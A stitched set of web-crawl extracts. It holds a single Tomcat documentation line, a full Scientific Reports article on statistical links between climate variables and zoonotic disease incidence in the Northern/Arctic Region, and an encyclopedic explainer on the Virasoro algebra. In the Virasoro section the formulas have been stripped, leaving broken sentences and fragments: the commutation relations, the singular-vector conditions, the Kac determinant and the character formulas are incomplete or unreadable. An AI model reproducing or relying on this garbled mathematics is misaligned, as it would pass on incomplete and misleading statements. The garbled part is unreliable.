And, if you think something should be in the docs, by all means let us know on the TOMCAT-DEV list. | <urn:uuid:e3de090d-f52a-4fa9-a1ef-52afc16e396d> | CC-MAIN-2023-14 | http://biaozhanggui.com/docs/introduction.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945183.40/warc/CC-MAIN-20230323194025-20230323224025-00210.warc.gz | en | 0.840025 | 1,678 | 2.8125 | 3 |
Recognition of climate-sensitive infectious diseases is crucial for mitigating health threats from climate change. Recent studies have reasoned about potential climate sensitivity of diseases in the Northern/Arctic Region, where climate change is particularly pronounced. By linking disease and climate data for this region, we here comprehensively quantify empirical climate-disease relationships. Results show significant relationships of borreliosis, leptospirosis, tick-borne encephalitis (TBE), Puumala virus infection, cryptosporidiosis, and Q fever with climate variables related to temperature and freshwater conditions. These data-driven results are consistent with previous reasoning-based propositions of climate-sensitive infections as increasing threats for humans, with notable exceptions for TBE and leptospirosis. For the latter, the data imply decrease with increasing temperature and precipitation experienced in, and projected for, the Northern/Arctic Region. This study provides significant data-based underpinning for simplified empirical assessments of the risks of several infectious diseases under future climate change.
There are indications of climate change driving spatiotemporal shifts in incidence for certain diseases1,2,3,4,5. Identification of such climate-sensitive infections (CSIs) is crucial for mitigating climate-driven disease threats. In the Northern/Arctic Region, climate change is particularly rapid and severe1,2,6, as ecosystems change7,8 and animals move towards the North Pole3, bringing microorganisms new for the territories, some of which can cause infections in humans (i.e., zoonoses), causing outbreaks of different magnitude such as epidemics or pandemics. Previous studies have reasoned about potential CSIs, such as borreliosis and tick-borne encephalitis (TBE), based on theoretical, laboratory, and mainly local disease incidence indications9,10,11. However, it is unknown whether these sensitivity estimates are supported by empirical data for climate and disease outbreaks on a large scale, such as over the Northern/Arctic Region. Data-driven identification of emerging disease relationships to observed climate change can be used to test more qualitative, theoretical, and local climate-sensitivity hypotheses and implications towards more accurate, evidence-based, and potentially simplified assessments of disease threats in future scenarios.
In this study, we used synchronous climate and disease incidence data for the Northern/Arctic Region for such data-driven identification of observation-based disease co-variations with recent and ongoing climate change in the region. Disease data were compiled in a regional dataset for seven zoonotic diseases (borreliosis, tularemia, leptospirosis, Q fever, TBE, Puumala virus infection, cryptosporidiosis) caused by pathogenic microorganisms using different vectors in ecosystems to infect humans (Table 1). These data are all derived from diagnosed cases using laboratory confirmation, and cover six Northern/Arctic countries or country parts (Greenland, Iceland, Norway, Sweden, Finland, and parts of northern Russia), distributed across 32–86 regional districts with the longest disease records (from 1969 to 2016)12. Along with the disease data, we compiled synchronous data for 22 different climate variables, considering possible climate change impacts on host–pathogen systems13 and including several primary (bio)climate variables14. These include annual mean, maximum, and minimum monthly and seasonal temperature and precipitation, along with temperature and precipitation in the warmest, coldest, wettest, and driest quarter of each year. Monthly values of these climate variables were obtained from open-access high-resolution gridded datasets of the Climate Research Unit (CRU)15, and aggregated to the relevant spatiotemporal scale for linking with corresponding disease data.
The statistical relationships between reported disease and climate data were analyzed using Spearman’s correlation coefficient and stepwise regression (significance level p < 0.01; see further “Methods”). Consistent spatial aggregation of both climate and disease data over various scales was also used to distinguish a possible emerging large-scale signal from the noise of geographic/spatial variability in the climate-disease relationships. The different scales considered were sub-national, national, and the south/north parts of and the whole multi-national Northern/Arctic Region spanned by the different countries/country parts with data. Such multi-scale exploration of climate-disease relationships reveals their local variability, the degree to which this is dampened on larger scales to reveal a clearer overarching regional relationship pattern, and the representativeness of this pattern for various parts of the region.
Results and discussion
Climate change in the Northern/Arctic Region
During the entire study period, determined by relevant data coverage (1995–2015), the climate has overall become warmer and wetter across the Northern/Arctic Region (Fig. 1a), with mean annual temperature and precipitation both increasing from the first (1995–2005) to the second (2005–2015) half of the period (Supplementary Fig. S1a,b). Changes in average monthly values differ among months and seasons (Fig. 1b,c; Supplementary Fig. S1c,d). All countries or areas studied, i.e., those with relevant data availability in the region (Fig. 1a), display similar patterns of change in monthly temperature, with the highest increases during March-June and September-December, and declines around February (Fig. 1b). This implies warming in spring, summer, and autumn, but little change in average winter temperature (Supplementary Fig. S1c). The seasonal changes in precipitation vary more, including in direction of change, among countries or country parts than temperature does (Fig. 1c; Supplementary Fig. S1d). On average, the precipitation changes are relatively small across the study region, although still with considerable overall increases emerging during June–August and November–December.
Changes in annual incidence of diseases
Disease incidences are unevenly distributed among the countries/country parts studied across the Northern/Arctic Region. For example, annual incidences of TBE in eastern Russia (Fig. 2e) and that of Puumala virus infection in Finland (Fig. 2f) are markedly higher than elsewhere in the region. Furthermore, average incidence levels vary between the diseases, with Q fever having the lowest annual incidence level (5-year running mean) of less than 0.1 cases per 100,000 inhabitants (Fig. 2d). In general, the incidences of borreliosis (Fig. 2a) and that of cryptosporidiosis (Fig. 2g) show an increasing trend, both nationally and regionally (Supplementary Fig. S2), while that of leptospirosis (Fig. 2c) and TBE (Fig. 2e) show region-scale decline (black lines) but with some regional increases in certain countries (thin colored lines; see also Supplementary Fig. S2). The other diseases show no clear regional trends in incidence, but rather variations around more or less stable region-average levels (Fig. 2b,d,f; Supplementary Fig. S2).
Disease incidence level and trends may also differ between the northern and southern parts of the study region, divided by latitude 63°N (Supplementary Fig. S3). The incidences of tularemia, TBE, and Puumala virus infection are higher in the north than in the south (Fig. 3b,e,f), even though the southern part has considerably higher population density (Supplementary Fig. S4). Regarding change trends, borreliosis, leptospirosis, TBE, and Puumala virus infection change in the same direction in both parts as over the whole region (Fig. 3a,c,e,f, Supplementary Fig. S5). This implies that the whole-region trend is representative of a general change pattern for these diseases over the study region. In contrast, the incidence of tularemia changes in opposite directions in the northern and southern parts of the region (Fig. 3b). This implies a more considerable geographic variability for this disease, which is dampened and masked in large-scale averaging so that the whole-region trend becomes small and hardly noticeable. This may also indicate that the spatial foci of this disease have expanded or shifted within the region. Regarding Q fever, this is more common in the south (Fig. 3d), so the overall whole-region trend is dominated by the change trend in the south, while cryptosporidiosis shows several striking temporal peaks in the north, and a relatively low increasing change trend in the south (Fig. 3g), which in combination lead to the clearly increasing whole-region trend for this disease.
Correlations between the diseases and climate variables
In the whole-region analysis, six of the seven target diseases (borreliosis, leptospirosis, TBE, Puumala virus infection, cryptosporidiosis, Q fever) show significant relationships with multiple climate variables, with Spearman’s correlation coefficient \(0.61\le \left|\rho \right|\le 0.98\), p < 0.01 (Supplementary Table S1). Specifically, incidence of borreliosis, Puumala virus infection, and cryptosporidiosis show strong positive relationships with autumn temperature (Spearman’s \(\rho\) = 0.75), annual maximum monthly precipitation (ρ = 0.82), and mean temperature of the wettest quarter (ρ = 0.85). TBE and leptospirosis, both of which decrease over the study period, show negative relationships with spring precipitation (ρ = − 0.98) and spring temperature (ρ = − 0.95). Q fever shows no obvious trend in incidence, but is still correlated negatively with annual minimum monthly precipitation (ρ = − 0.71). Tularemia does not show significant correlations with any selected climate variable.
These results are to some degree consistent with qualitative assessment propositions for climate sensitivity of various diseases in Europe9. However, TBE and leptospirosis exhibit decreases, rather than increases, under the overall warming and wetting trends actually experienced in the Northern/Arctic Region over the study period with data availability, with these findings discussed further below. Tularemia has been identified as a possible CSI in other assessments9,19 but does not emerge as such in the present whole-region analysis. This is likely due to the large variability in disease change trends, which are also in opposite directions in different parts of the region and thereby counteract each other in the region-scale averaging of local trends. This counteracting trend variability is, for example, seen between the southern and northern trends in later years in Fig. 3, and has also been reported for tularemia over different parts of Sweden20.
Figure 4 shows the climate variables that emerge from the statistical analysis as being most closely related to the incidence of each CSI, with the analysis also including stepwise regression to avoid mutual correlation between variables (Supplementary Table S2). The results indicate the following ranking of the strongest identified proxy climate-disease relationships (R2 ≥ 0.8) for five of the seven target CSIs studied: borreliosis with autumn temperature (R2 = 0.8, Fig. 4a); leptospirosis with spring temperature (R2 = 0.9, Fig. 4b); TBE with spring precipitation (R2 = 0.8, Fig. 4c); Puumala virus infection with annual maximum monthly precipitation (R2 = 0.8, Fig. 4d); and cryptosporidiosis with mean temperature of the wettest quarter (R2 = 0.9, Fig. 4e). Q fever correlates only with annual minimum monthly precipitation and with a weak correlation (R2 = 0.5) (Fig. 4f).
The strongest disease correlations with climate variables are thus temperature-related for borreliosis and leptospirosis, water-related for Puumala virus infection, TBE and Q fever, and both temperature and water (hydro-climatically) related for cryptosporidiosis. The negative relationships with hydro-climate observed for leptospirosis (Fig. 4b) and TBE (Fig. 4c) imply decreases, rather than increases, in these diseases with the temperature and precipitation increases experienced over the two decades of the study period (1995–2015) and also projected for the future climate over the study region2.
In further analysis of the northern and southern parts of the region, somewhat different climate-disease correlations might be expected due to the various disease change trends exhibited in the different smaller-scale parts (Fig. 3). For example, TBE shows no clear climate sensitivity at the smaller scales due to the relatively small incidence trends at these scales. In combination, however, the similarly directed smaller-scale trends lead to a clear decreasing trend over the whole region. Tularemia, with more highly variable smaller-scale trends, including in opposite directions, emerges as correlated with spring temperature in the north, due to a clear increasing trend in annual incidence in this part of the region (Supplementary Table S2). This is counteracted by the decrease trend exhibited in the southern part of the region and thereby masked in the aggregated whole-region trend. Borreliosis shows fully consistent whole-region and smaller-scale correlations with the same two climate variables, autumn and spring temperature (Supplementary Table S2). This indicates a likely strong sensitivity of borreliosis to these two variables, persisting across different spatial scales and parts of the region.
Comparison with evidence from previous studies
The results of our large-scale data analysis show some consistency with local observations and mechanical explanations, but also differences due to likely unrelated factors. At whole-region scale, the incidences of TBE are negatively correlated with all (hydro-)climate variables, while those of borreliosis are positively correlated with all climate variables. This is despite the fact that these diseases share the same vector, Ixodidae ticks, for which increased annual temperature is reported to increase incidences of tick bites21 and the geographic range of ticks, due to the expanded geographic range of associated vegetation communities and mammals caused by a prolonged vegetation period22. Some researchers have also argued that the reporting of tick bites has increased due to increased public awareness23 and more time spent outdoors24, along with the changes in climate, tick bites, and tick range. The decreasing trend in TBE incidence, in spite of these tick increase drivers, might therefore be explained by other, counteracting societal factors, such as vaccination rate co-increasing along with the climate and disease-report factors.
A previous study concluded that leptospirosis is positively correlated with rainfall and temperature25. However, in consistency with findings in other previous studies26, the results of our data-driven analysis for cryptosporidiosis show significant positive correlations with temperature variables, but negative correlation with annual maximum precipitation. Climate-independent societal factors, such as improved sanitation and increased public awareness, may also play a role for the present empirical findings of decreased leptospirosis under the overall warming and wetting experienced in the study region.
The predominantly water-driven increase in Puumala virus infection with increasing summer and autumn precipitation is consistent with reported positive correlations of the rodent disease-host population with heavy rainfall27. The significant infection increase with higher temperature of the driest quarter is likely also hydro-climatically related, consistent with less snow cover during milder winters, when decreasing host protection forces the disease hosts closer to human settlements28.
Q fever has been found to be related to droughts10 due to its wind-borne transmission pathway, and mainly emerges following droughts. The negative correlation observed here between Q fever and annual minimal precipitation is to some degree explainable by this mechanism.
Limitations of the study
A primary limitation of this study is that reported laboratory diseases data may not represent actual infection in the community, because some of the infections are mild or even subclinical, so that infected people might not seek healthcare. To estimate the true prevalence of infections, serology would need to be used as a complement in population-based studies. However, serological tests are only performed in specific studies and are not currently used as a tool for monitoring transitions in infectious diseases. In addition, some diseases are not notifiable in all countries because of the significant differences in the registration of epidemic data historically29, which requires more efforts to obtain such data for comparable studies across borders.
A second limitation is that the results do not reveal the mechanistic causal relationships that underlie the statistical correlations, and thus need to be interpreted with caution. The strong correlations observed may be caused by either direct or indirect impacts, or even other unrelated factors, and include spurious correlations. However, the focus of this study is on data-based distinction of possible clear long-term, large-scale statistical signals in climate-disease relationships, consistent with the climate-change driver that is, by definition, long-term and large scale, different from the noise of shorter-term, smaller-scale weather-disease variations. This focus implies that the general limitation of statistical correlations versus mechanistic relationships is unavoidable in such a study, and both of these complementary types of analysis are needed and should be compared with each other to move the field forward.
Overall, the large variability in local incidences of the target diseases around and compared with the large-scale region-average conditions (Fig. 2) implies that disease studies performed for different site-specific geographic locations using various scales of supporting data may lead to apparent contradictory or inconsistent results that may or may not be representative of average disease characteristics and change trends emerging over larger regional scales. Across the large regional scale of the entire Northern/Arctic Region (Fig. 1a), our empirical findings suggest significant overarching climate sensitivity of six human diseases (Fig. 4). The negative correlations of TBE and leptospirosis with recent warming and wetting in this region may be surprising and call for further data-driven, large-scale disease studies, as well as targeted mechanistic theoretical and laboratory studies. Climate-independent societal trends, such as general vaccination, sanitation, and public awareness improvements, may coincide with climate change trends and confuse cause-effect attributions for disease trends. This calls for further studies that also include data for such relevant societal factors, as well consistent comparison of disease trends across different countries and regions. However, data-driven studies that link disease and climate trends are useful also in the absence of additional societal data, as they can identify and point out disease trend scenarios without societal mitigation interventions, and thereby support empirically based assessment and prioritization of needs for such interventions.
Disease data for the regional dataset are compiled from laboratory reported incidence for the seven zoonotic diseases chosen covering six Northern/Arctic countries and regions (Greenland, Iceland, Norway, Sweden, Finland, and parts of northern Russia). The countries are represented by 32 to 86 districts, with the longest records from 1969 to 2016. We ignored regions with less than 10-year data prior to 2015, and thus retained data only for Norway, Sweden, Finland, and Russia. However, not all diseases are notifiable in all studied countries, for example, borreliosis is not notifiable in Sweden and leptospirosis is not notifiable in Norway29. Annual incidence of a disease in each country or in the entire region was calculated as total reported absolute cases divided by total population in selected reporting districts. The time period considered when assessing incidence in the whole region only covered a continuous time sequence ranging from the first year to the latest with at most one country or part of country (eastern part of Russia or western part of Russia). Therefore, Q fever has a time series of annual incidence from 1998 to 2015, TBE from 2002 to 2015, cryptosporidiosis from 2004 to 2016, and the other diseases from 1995 to 2015.
Twenty-two climate variables were selected and calculated from the Climate Research Unit’s (CRU) version 4.04 high-resolution gridded dataset15. These were annual mean, maximum, and minimum monthly and seasonal temperature and precipitation, along with temperature and precipitation of the warmest, coldest, wettest, and driest quarter. No missing data appeared in the study region. Grid cells with at least 50% of their area located in the selected districts of the respective disease in the previous step were area-weighted averaged to obtain values for the entire region. The warmest quarter coincides with the summer months (June–August), so in this case the temperature or precipitation of the warmest quarter is represented by the same data as those for the summer. The coldest quarter is also essentially the same as winter (December-February), except in the year 1992/1993, when the coldest quarter was shifted to 1 month earlier than the normal winter period. The wettest quarter varies between summer and autumn months (June–September), and the driest quarter between winter and spring months (January-May).
To make comparisons between the north (low population density) and the south (high population density) for the trends in the diseases and their correlations with climate variables, the European part (excluding eastern Russia) of the study region, based on the centroid of each district, was divided into two parts by latitude 63°N. Annual incidence of diseases and climate data for the two constituent southern and northern parts were calculated with the same methods as for the whole region.
Spearman correlation analysis was conducted to investigate relationships between diseases and climate variables. Statistical significance was set to p < 0.01. We applied a 5-year running mean filter to both datasets, on the one hand to be consistent with the “long-term” concept of climate and on the other hand to avoid lack of freedom in the later regression. We then used stepwise (combined forward and backward) regression analysis to identify statistically significant variables contributing to variations in the incidence of each disease, while minimizing the effect of collinearity among variables. Candidate climate variables fed into stepwise regression are those with significance level p < 0.01 in Spearman correlation analysis. A variable is considered for addition or subtraction based on the significance level, which was again set at p < 0.01.
All the data used in our analyses are available online. Data on the epidemiology and geography of infectious diseases are published in the CLINF GIS Public Data Repository (https://clinf.org/home/clinf-geographic-information-system/). Monthly data on the climate variables were obtained from high-resolution gridded datasets of the Climate Research Unit (CRU) (https://catalogue.ceda.ac.uk/uuid/89e1e34ec3554dc98594a5732622bce9), and aggregated to the relevant spatiotemporal scale for linking with corresponding disease data.
IPCC. Global Warming of 1.5 °C. An IPCC Special Report on the impacts of global warming of 1.5 °C above pre-industrial levels and related global greenhouse gas emission pathways, in the context of strengthening the global response to the threat of climate change, sustainable development, and efforts to eradicate poverty (eds Masson-Delmotte, V. et al.) (2018) (in Press).
IPCC. Climate Change 2014: Synthesis Report. Contribution of working groups I, II and III to the fifth assessment report of the intergovernmental panel on climate change (eds Core Writing Team, et al.) 151 (2014).
Pecl, G. T. et al. Biodiversity redistribution under climate change: Impacts on ecosystems and human well-being. Science 355, eaai9214 (2017).
Smith, K. R. & Woodward, A. Human health: impacts, adaptation, and co-benefits. In Climate Change 2014: Impacts, Adaptation, and Vulnerability. Part A: Global and Sectoral Aspects. Contribution of Working Group II to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change 709–754. https://www.ipcc.ch/report/ar5/wg2/human-health-impacts-adaptation-and-co-benefits/ (2014).
Thierfelder, T. & Evengård, B. CLINF: an integrated project design. In Nordic Perspectives on the Responsible Development of the Arctic: Pathways to Action (ed. Nord, D. C.) 71–92 (Springer International Publishing, 2021) https://doi.org/10.1007/978-3-030-52324-4_4.
Moritz, R. E., Bitz, C. M. & Steig, E. J. Dynamics of recent climate change in the Arctic. Science 297, 1497–1502 (2002).
Karlsson, J. M., Jaramillo, F. & Destouni, G. Hydro-climatic and lake change patterns in Arctic permafrost and non-permafrost areas. J. Hydrol. 529, 134–145 (2015).
Selroos, J.-O., Cheng, H., Vidstrand, P. & Destouni, G. Permafrost thaw with thermokarst wetland-lake and societal-health risks: Dependence on local soil conditions under large-scale warming. Water 11, 574 (2019).
Lindgren, E., Andersson, Y., Suk, J. E., Sudre, B. & Semenza, J. C. Monitoring EU emerging infectious disease risk due to climate change. Science 336, 418–419 (2012).
Omazic, A. et al. Identifying climate-sensitive infectious diseases in animals and humans in Northern regions. Acta Vet. Scand. 61, 53 (2019).
Waits, A., Emelyanova, A., Oksanen, A., Abass, K. & Rautio, A. Human infectious diseases and the changing climate in the Arctic. Environ. Int. 121, 703–713 (2018).
Thierfelder, T., Berggren, C., Omazic, A. & Evengård, B. Metadata concerning the diseases maps stored under the directory “Human CSI”. https://clinf.org/home/clinf-geographic-information-system/ (2019).
Altizer, S., Ostfeld, R. S., Johnson, P. T. J., Kutz, S. & Harvell, C. D. Climate change and infectious diseases: From evidence to a predictive framework. Science 341, 514–519 (2013).
Hijmans, R. J., Cameron, S. E., Parra, J. L., Jones, P. G. & Jarvis, A. Very high resolution interpolated climate surfaces for global land areas. Int. J. Climatol. 25, 1965–1978 (2005).
Harris, I., Osborn, T. J., Jones, P. & Lister, D. Version 4 of the CRU TS monthly high-resolution gridded multivariate climate dataset. Sci. Data 7, 109 (2020).
Angelakis, E. & Raoult, D. Q fever. Vet. Microbiol. 140, 297–309 (2010).
Chen, X.-M., Keithly, J. S., Paya, C. V. & LaRusso, N. F. Cryptosporidiosis. N. Engl. J. Med. 346, 1723–1731 (2002).
Malkhazova, S., Mironova, V., Shartova, N. & Orlov, D. Mapping Russia’s Natural Focal Diseases: History and Contemporary Approaches (Springer Nature, 2019).
Ma, Y., Bring, A., Kalantari, Z. & Destouni, G. Potential for hydroclimatically driven shifts in infectious disease outbreaks: The case of tularemia in high-latitude regions. Int. J. Environ. Res. Public Health 16, 3717 (2019).
Ma, Y., Vigouroux, G., Kalantari, Z., Goldenberg, R. & Destouni, G. Implications of projected hydroclimatic change for tularemia outbreaks in high-risk areas across Sweden. Int. J. Environ. Res. Public Health 17, 6786 (2020).
Vladimirov, L. N. et al. Quantifying the northward spread of ticks (Ixodida) as climate warms in Northern Russia. Atmosphere 12, 233 (2021).
Jaenson, T. G. T. & Lindgren, E. The range of Ixodes ricinus and the risk of contracting Lyme borreliosis will increase northwards when the vegetation period becomes longer. Ticks Tick Borne Dis. 2, 44–49 (2011).
Scott, J., & Scott, C. Lyme disease propelled by borrelia burgdorferi-infected blacklegged ticks, wild birds and public awareness—Not climate change. J. Vet. Sci. Med. 6, 01–08 (2018).
Kilpatrick, A. M. & Randolph, S. E. Drivers, dynamics, and control of emerging vector-borne zoonotic diseases. Lancet 380, 1946–1955 (2012).
Lau, C. L., Smythe, L. D., Craig, S. B. & Weinstein, P. Climate change, flooding, urbanisation and leptospirosis: Fuelling the fire?. Trans. R. Soc. Trop. Med. Hyg. 104, 631–638 (2010).
Ikiroma, I. A. & Pollock, K. G. Influence of weather and climate on cryptosporidiosis—A review. Zoonoses Public Health 68, 285–298 (2020).
Gubler, D. J. et al. Climate variability and change in the United States: Potential impacts on vector- and rodent-borne diseases. Environ. Health Perspect. 109, 223–233 (2001).
Evander, M. & Ahlm, C. Milder winters in northern Scandinavia may contribute to larger outbreaks of haemorrhagic fever virus. Glob. Health Action 2, 2020 (2009).
Omazic, A., Berggren, C., Thierfelder, T., Koch, A. & Evengard, B. Discrepancies in data reporting of zoonotic infectious diseases across the Nordic countries—A call for action in the era of climate change. Int. J. Circumpolar Health 78, 1601991 (2019).
We are thankful for the support from the Nordforsk Centre of Excellence CLINF (grant number 76413). We acknowledge the Climatic Research Unit (CRU) for providing well-constructed data for our study.
Open access funding provided by Stockholm University. This work was supported by the Nordforsk Centre of Excellence CLINF (grant number 76413).
The authors declare no competing interests.
Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Rights and permissions
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/.
About this article
Cite this article
Ma, Y., Destouni, G., Kalantari, Z. et al. Linking climate and infectious disease trends in the Northern/Arctic Region. Sci Rep 11, 20678 (2021). https://doi.org/10.1038/s41598-021-00167-z
By submitting a comment you agree to abide by our Terms and Community Guidelines. If you find something abusive or that does not comply with our terms or guidelines please flag it as inappropriate. | <urn:uuid:8ee2bec3-4550-44ab-855e-7bac1d74798d> | CC-MAIN-2023-14 | https://www.nature.com/articles/s41598-021-00167-z?error=cookies_not_supported | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949689.58/warc/CC-MAIN-20230331210803-20230401000803-00410.warc.gz | en | 0.904147 | 6,898 | 2.609375 | 3 |
Virasoro algebra explained
In mathematics, the Virasoro algebra (named after the physicist Miguel Ángel Virasoro) is a complex Lie algebra and the unique central extension of the Witt algebra. It is widely used in two-dimensional conformal field theory and in string theory.
The Virasoro algebra is spanned by generators for and the central charge .These generators satisfy
and The factor of
is merely a matter of convention. For a derivation of the algebra as the unique central extension of the Witt algebra
, see derivation of the Virasoro algebra.
The Virasoro algebra has a presentation in terms of two generators (e.g. 3 and −2) and six relations.
Highest weight representations
A highest weight representation of the Virasoro algebra is a representation generated by a primary state: a vector
where the number is called the conformal dimension or conformal weight of
A highest weight representation is spanned by eigenstates of
. The eigenvalues take the form
, where the integer
is called the level of the corresponding eigenstate.
More precisely, a highest weight representation is spanned by
-eigenstates of the type
, whose levels are
. Any state whose level is not zero is called a descendant state of
is the largest possible highest weight representation. (The same letter is used for both the element of the Virasoro algebra and its eigenvalue in a representation.)
form a basis of the Verma module. The Verma module is indecomposable, and for generic values of and it is also irreducible. When it is reducible, there exist other highest weight representations with these values of and, called degenerate representations, which are cosets of the Verma module. In particular, the unique irreducible highest weight representation with these values of and is the quotient of the Verma module by its maximal submodule.
A Verma module is irreducible if and only if it has no singular vectors.
A singular vector or null vector of a highest weight representation is a state that is both descendent and primary.
A sufficient condition for the Verma module
to have a singular vector at the level
for some positive integers
)2-(br+b-1s)2) , where c=1+6(b+b-1)2 .
, and the reducible Verma module
has a singular vector
at the level
, and the corresponding reducible Verma module has a singular vector
at the level
This condition for the existence of a singular vector at the level
is not necessary. In particular, there is a singular vector at the level
. This singular vector is now a descendent of another singular vector at the level
. This type of singular vectors can however only exist if the central charge is of the type
coprime, these are the central charges of the minimal models
Hermitian form and unitarity
A highest weight representation with a real value of
has a unique Hermitian form such that the Hermitian adjoint of
and the norm of the primary state is one.The representation is called unitary
if that Hermitian form is positive definite. Since any singular vector has zero norm, all unitary highest weight representations are irreducible.
The Gram determinant of a basis of the level
is given by the Kac determinant formula
where the function p
) is the partition function
is a positive constant that does not depend on
. The Kac determinant formula was stated by V. Kac
(1978), and its first published proof was given by Feigin and Fuks (1984).
The irreducible highest weight representation with values and is unitary if and only if either ≥ 1 and ≥ 0, or
is one of the values
= 1, 2, 3, ..., m
− 1 and s
= 1, 2, 3, ..., r
Daniel Friedan, Zongan Qiu, and Stephen Shenker (1984) showed that these conditions are necessary, and Peter Goddard, Adrian Kent, and David Olive (1986) used the coset construction or GKO construction (identifying unitary representations of the Virasoro algebra within tensor products of unitary representations of affine Kac–Moody algebras) to show that they are sufficient.
The character of a representation
of the Virasoro algebra is the function
} q^.The character of the Verma module
}(q) = \frac = \frac=q^\left(1+q+2q^2+3q^3+5q^4+\cdots\right), where
is the Dedekind eta function
, the Verma module
is reducible due to the existence of a singular vector at level
. This singular vector generates a submodule, which is isomorphic to the Verma module
. The quotient of
by this submodule is irreducible if
does not have other singular vectors, and its character is
} = \chi_ -\chi_ = (1-q^) \chi_.
is in the Kac table of the corresponding minimal model
). The Verma module
has infinitely many singular vectors, and is therefore reducible with infinitely many submodules. This Verma module has an irreducible quotient by its largest nontrivial submodule. (The spectrums of minimal models are built from such irreducible representations.) The character of the irreducible quotient is
}-\chi_\right).\endThis expression is an infinite sum because the submodules
have a nontrivial intersection, which is itself a complicated submodule.
Conformal field theory
In two dimensions, the algebra of local conformal transformations is made of two copies of the Witt algebra.It follows that the symmetry algebra of two-dimensional conformal field theory is the Virasoro algebra. Technically, the conformal bootstrap approach to two-dimensional CFT relies on Virasoro conformal blocks, special functions that include and generalize the characters of representations of the Virasoro algebra.
Since the Virasoro algebra comprises the generators of the conformal group of the worldsheet, the stress tensor in string theory obeys the commutation relations of (two copies of) the Virasoro algebra. This is because the conformal group decomposes into separate diffeomorphisms of the forward and back lightcones. Diffeomorphism invariance of the worldsheet implies additionally that the stress tensor vanishes. This is known as the Virasoro constraint, and in the quantum theory, cannot be applied to all the states in the theory, but rather only on the physical states (compare Gupta–Bleuler formalism).
Super Virasoro algebras
See main article: Super Virasoro algebra. There are two supersymmetric N = 1 extensions of the Virasoro algebra, called the Neveu–Schwarz algebra and the Ramond algebra. Their theory is similar to that of the Virasoro algebra, now involving Grassmann numbers. There are further extensions of these algebras with more supersymmetry, such as the N = 2 superconformal algebra.
See main article: W-algebra. W-algebras are associative algebras which contain the Virasoro algebra, and which play an important role in two-dimensional conformal field theory. Among W-algebras, the Virasoro algebra has the particularity of being a Lie algebra.
Affine Lie algebras
See main article: affine Lie algebra. The Virasoro algebra is a subalgebra of the universal enveloping algebra of any affine Lie algebra, as shown by the Sugawara construction. In this sense, affine Lie algebras are extensions of the Virasoro algebra.
Meromorphic vector fields on Riemann surfaces
The Virasoro algebra is a central extension of the Lie algebra of meromorphic vector fields with two poles on a genus 0 Riemann surface.On a higher-genus compact Riemann surface, the Lie algebra of meromorphic vector fields with two poles also has a central extension, which is a generalization of the Virasoro algebra. This can be further generalized to supermanifolds.
Vertex algebras and conformal algebras
The Virasoro algebra also has vertex algebraic and conformal algebraic counterparts, which basically come from arranging all the basis elements into generating series and working with single objects.
The Witt algebra (the Virasoro algebra without the central extension) was discovered by É. Cartan (1909). Its analogues over finite fields were studied by E. Witt in about the 1930s. The central extension of the Witt algebra that gives the Virasoro algebra was first found (in characteristic p > 0) by R. E. Block (1966, page 381) and independently rediscovered (in characteristic 0) by I. M. Gelfand and Dmitry Fuchs (1968). Virasoro (1970) wrote down some operators generating the Virasoro algebra (later known as the Virasoro operators) while studying dual resonance models, though he did not find the central extension. The central extension giving the Virasoro algebra was rediscovered in physics shortly after by J. H. Weis, according to Brower and Thorn (1971, footnote on page 167).
- . 1984 . Infinite conformal symmetry in two-dimensional quantum field theory . . 241 . 333–380 . 10.1016/0550-3213(84)90052-X . 2. 1984NuPhB.241..333B .
- R. E. Block . 1966 . On the Mills–Seligman axioms for Lie algebras of classical type . . 121 . 378–392 . 1994485 . 10.1090/S0002-9947-1966-0188356-3 . 2. free .
- R. C. Brower . C. B. Thorn . 1971 . Eliminating spurious states from the dual resonance model . . 31 . 1 . 163–182 . 10.1016/0550-3213(71)90452-4. 1971NuPhB..31..163B . .
- E. Cartan . 1909 . Les groupes de transformations continus, infinis, simples . Annales Scientifiques de l'École Normale Supérieure . 26 . 93–161 . 40.0193.02 . 10.24033/asens.603. free .
- B. L. Feigin, D. B. Fuchs, Verma modules over the Virasoro algebra L. D. Faddeev (ed.) A. A. Mal'tsev (ed.), Topology. Proc. Internat. Topol. Conf. Leningrad 1982, Lect. notes in math., 1060, Springer (1984) pp. 230–245
- Friedan, D., Qiu, Z. and Shenker, S. . 1984 . Conformal invariance, unitarity and critical exponents in two dimensions . . 52 . 1575–1578 . 10.1103/PhysRevLett.52.1575 . 18. 1984PhRvL..52.1575F . 122320349 . .
- I.M. Gel'fand, D. B. Fuchs, The cohomology of the Lie algebra of vector fields in a circle Funct. Anal. Appl., 2 (1968) pp. 342–343 Funkts. Anal. i Prilozh., 2 : 4 (1968) pp. 92–93
- P. Goddard, A. Kent . D. Olive . amp . 1986 . Unitary representations of the Virasoro and super-Virasoro algebras . . 103 . 1 . 105–119 . 0826859 . 0588.17014 . 10.1007/BF01464283. 1986CMaPh.103..105G . 91181508 . .
- A. Kent . 1991 . Singular vectors of the Virasoro algebra . . 273 . 1–2 . 56–62 . 10.1016/0370-2693(91)90553-3. hep-th/9204097 . 1991PhLB..273...56K . 15105921 .
- V. G. Kac, "Highest weight representations of infinite dimensional Lie algebras", Proc. Internat. Congress Mathematicians (Helsinki, 1978), pp.299-304
- V. G. Kac, A. K. Raina, Bombay lectures on highest weight representations, World Sci. (1987) .
- Dobrev . V. K. . 1986 . Multiplet classification of the indecomposable highest weight modules over the Neveu-Schwarz and Ramond superalgebras . Lett. Math. Phys. . 11 . 3. 225–234 . 10.1007/bf00400220 . 1986LMaPh..11..225D. 122201087 . & correction: ibid. 13 (1987) 260.
- V. K. Dobrev, "Characters of the irreducible highest weight modules over the Virasoro and super-Virasoro algebras", Suppl. Rendiconti del Circolo Matematico di Palermo, Serie II, Numero 14 (1987) 25-42.
- Antony Wassermann. Lecture notes on Kac-Moody and Virasoro algebras . 1004.1287. math.RT. 2010. Antony Wassermann .
